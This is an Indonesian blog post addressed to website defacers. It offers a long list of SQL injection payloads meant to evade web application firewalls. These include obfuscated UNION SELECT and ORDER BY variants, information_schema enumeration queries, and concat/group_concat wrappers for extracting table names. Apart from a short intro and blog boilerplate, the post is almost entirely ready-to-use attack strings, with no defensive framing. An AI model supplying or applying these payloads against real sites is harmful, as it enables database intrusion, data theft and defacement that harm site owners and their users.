Macam-Macam Bypass Sqli Dengan Waff - Bagi Template
Macam-Macam Bypass Sqli Dengan Waff

Selasa, 01 September 2015

Macam-Macam Bypass Sqli Dengan Waff

, ,    Comment   
Macam-Macam Bypass SQLI dengan WAFF - Hello guys dah usang nih ga update artikel hehehe dan kali ini aku membagikan  Macam-Macam Bypass SQLI dengan WAFF,  niscaya bagi kalian para Defacer sudah tidak gila lagi dengan POC SQL-Injection, yap POC ini dapat dibilang mudah/susah tergantung webnya, jikalau kau sering mengalami error dikala sedang meng-inject sqlnya hening aja disini aku akan memberikan Macam-Macam Bypass SQLI dengan WAFF, dibawah yaaa.




WAFF
 [ ] order by [ ]  /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/  [ ] UNION select [ ]  /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ +%2F**/+Union/*!select*/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ uNiOn aLl sElEcT UNIunionON+SELselectECT /**/union/*!50000select*//**/ 0%a0union%a0select%09 %0Aunion%0Aselect%0A %55nion/**/%53elect uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ %0A%09UNION%0CSELECT%10NULL% /*!union*//*--*//*!all*//*--*//*!select*/ union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ +UnIoN/*&a=*/SeLeCT/*&a=*/ union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa%0A#%0Aselect union(select (1),(2),(3),(4),(5)) UNION(SELECT(column)FROM(table)) %23xyz%0AUnIOn%23xyz%0ASeLecT+ %23xyz%0A%55nIOn%23xyz%0A%53eLecT+ union(select(1),2,3) union (select 1111,2222,3333) uNioN (/*!/**/ SeleCT */ 11) union (select 1111,2222,3333) +#1q%0AuNiOn all#qa%0A#%0AsEleCt /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ /union\sselect/g /union\s+select/i /*!UnIoN*/SeLeCT +UnIoN/*&a=*/SeLeCT/*&a=*/ +uni>on+sel>ect+ +(UnIoN)+(SelECT)+ +(UnI)(oN)+(SeL)(EcT) +’UnI”On’+'SeL”ECT’ +uni on+sel ect+ +/*!UnIoN*/+/*!SeLeCt*/+ /*!u%6eion*/ /*!se%6cect*/ uni%20union%20/*!select*/%20 union%23aa%0Aselect /**/union/*!50000select*/ /^.*union.*$/ /^.*select.*$/ /*union*/union/*select*/select+ /*uni X on*/union/*sel X ect*/ +un/**/ion+sel/**/ect+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+  [ ] information_schema.tables [ ]  /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- - /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table   [ ] concat() [ ]  CoNcAt() concat()  CON%08CAT() CoNcAt() %0AcOnCat() /**//*!12345cOnCat*/ /*!50000cOnCat*/(/*!*/) unhex(hex(concat(table_name))) unhex(hex(/*!12345concat*/(table_name))) unhex(hex(/*!50000concat*/(table_name)))  [ ] group_concat() [ ]  /*!group_concat*/() gRoUp_cOnCAt() group_concat(/*!*/) group_concat(/*!12345table_name*/) group_concat(/*!50000table_name*/) /*!group_concat*/(/*!12345table_name*/) /*!group_concat*/(/*!50000table_name*/) /*!12345group_concat*/(/*!12345table_name*/) /*!50000group_concat*/(/*!50000table_name*/) /*!GrOuP_ConCaT*/() /*!12345GroUP_ConCat*/() /*!50000gRouP_cOnCaT*/() /*!50000Gr%6fuP_c%6fnCAT*/() unhex(hex(group_concat(table_name))) unhex(hex(/*!group_concat*/(/*!table_name*/))) unhex(hex(/*!12345group_concat*/(table_name))) unhex(hex(/*!12345group_concat*/(/*!table_name*/))) unhex(hex(/*!12345group_concat*/(/*!12345table_name*/))) unhex(hex(/*!50000group_concat*/(table_name))) unhex(hex(/*!50000group_concat*/(/*!table_name*/))) unhex(hex(/*!50000group_concat*/(/*!50000table_name*/))) convert(group_concat(table_name)+using+ascii) convert(group_concat(/*!table_name*/)+using+ascii) convert(group_concat(/*!12345table_name*/)+using+ascii) convert(group_concat(/*!50000table_name*/)+using+ascii) CONVERT(group_concat(table_name)+USING+latin1) CONVERT(group_concat(table_name)+USING+latin2) CONVERT(group_concat(table_name)+USING+latin3) CONVERT(group_concat(table_name)+USING+latin4) CONVERT(group_concat(table_name)+USING+latin5)

Sekian artikel Macam-Macam Bypass SQLI dengan WAFF Terima Kasih telah mengunjungi blog aku :)
Related
Comments


EmoticonEmoticon

:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
x-)
(k)
Notification
This is just an example, you can fill it later with your own note.
Done